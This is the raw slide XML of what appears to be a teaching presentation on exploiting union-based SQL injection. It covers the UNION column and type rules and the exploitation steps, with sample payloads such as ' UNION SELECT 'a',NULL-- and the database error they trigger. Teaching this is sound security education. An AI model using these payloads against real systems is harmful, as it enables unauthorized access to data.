            <a:r>
              <a:rPr dirty="0" sz="4250" spc="-215">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>an </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4250" spc="-620">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4250" spc="-55">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>injection </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4250" spc="-300">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>UNION</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4250" spc="-590">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4250" spc="-120">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>attack:</a:t>
            </a:r>
            <a:endParaRPr sz="4250">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" marR="203200" indent="-377190">
              <a:lnSpc>
                <a:spcPts val="3960"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="930"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1143000" algn="l"/>
                <a:tab pos="1143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-185">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Probe</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-180">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-210">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>each</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-170">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-110">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>column</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-175">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-170">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-60">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-170">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-50">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>whether</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-175">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="120">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-170">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-220">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-170">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-65">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>hold</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-175">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-85">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>string</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-170">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-125">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-175">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-140">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>by</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-175">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-65">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>submitting</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-170">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-265">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-175">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-180">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>series  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-260">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-600">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-175">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>payloads </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-160">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>place </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-265">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-85">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>string </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-150">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>value </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>into </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-204">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>each </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-110">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>column </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-35">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-680">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="20">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>turn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08946" y="5082065"/>
            <a:ext cx="15130780" cy="39370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7939" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="452120">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="219"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="739775" algn="l"/>
                <a:tab pos="1604010" algn="l"/>
                <a:tab pos="2612390" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="740">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>'	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-190">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>UNION	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-200">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SELECT	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="220">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>'a',NULL--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8946" y="5982854"/>
            <a:ext cx="15130780" cy="39370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9209" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="452120">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="229"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="2036445" algn="l"/>
                <a:tab pos="3044190" algn="l"/>
                <a:tab pos="3764279" algn="l"/>
                <a:tab pos="5348605" algn="l"/>
                <a:tab pos="5924550" algn="l"/>
                <a:tab pos="7077075" algn="l"/>
                <a:tab pos="7940675" algn="l"/>
                <a:tab pos="8517255" algn="l"/>
                <a:tab pos="8949055" algn="l"/>
                <a:tab pos="9669145" algn="l"/>
                <a:tab pos="10389235" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="95">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Conversion	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="315">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>failed	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-95">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>when	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="185">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>converting	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="180">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="155">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>varchar	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="150">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>value	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="490">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>'a'	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="275">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="135">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>data	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="160">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>type	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="445">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>int.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8946" y="6879926"/>
            <a:ext cx="16341090" cy="7105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7305" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="452120" marR="12280900">
              <a:lnSpc>
                <a:spcPct val="100499"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="215"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="739775" algn="l"/>
                <a:tab pos="1604010" algn="l"/>
                <a:tab pos="2611755" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="740">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="740">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-190">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>UNION</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-190">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-200">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-200">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="735">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="80">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a',NULL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="409">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>--  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="740">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-190">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>UNION</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-200">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="80">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>NULL,'a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="740">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="450">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>--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1266380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80"/>
              <a:t>Exploiting </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-235"/>
              <a:t>Union-Based</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-850"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-335"/>
              <a:t>SQLi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4752" y="2931714"/>
            <a:ext cx="16204565" cy="628142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 marR="360680">
              <a:lnSpc>
                <a:spcPts val="4950"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="755"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-245">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>There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200">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>are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20">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>two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160">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>rules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5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>for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155">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>combining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-45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the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100">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>result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254">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>sets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>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of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20">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>two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-170">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>queries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190">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>by  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-225">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>using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65" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>UNION</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-65">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr sz="4600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-280">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>The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110">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>number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180">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>and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80">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>order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>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of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175">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>columns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125">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>must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175">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>be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275">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>same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50">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>in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85">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>all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150">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>queries</a:t>
            </a:r>
            <a:endParaRPr sz="3950">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="385"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-280">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-145">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>data </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-150">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>types </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-125">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>must </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-175">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-320">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-110">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>compatible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6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4600" spc="-114">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Exploitation:</a:t>
            </a:r>
            <a:endParaRPr sz="4600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="415"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-210">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Figure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>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>out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110">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>number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>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of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175">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>columns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5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>that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114">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>query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204">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-175">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>making</a:t>
            </a:r>
            <a:endParaRPr sz="3950">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="365"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-210">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Figure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145">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>data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150">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>types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>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of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175">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>columns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114">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(mainly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105">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>interested</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-195">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-50">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>in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105">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>string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140">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>data)</a:t>
            </a:r>
            <a:endParaRPr sz="3950">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="285"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-330">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Use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295">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>UNION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85">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>operator</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-195">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="35">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to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5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>output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55">
                <a:latin typeface="Arial"/>
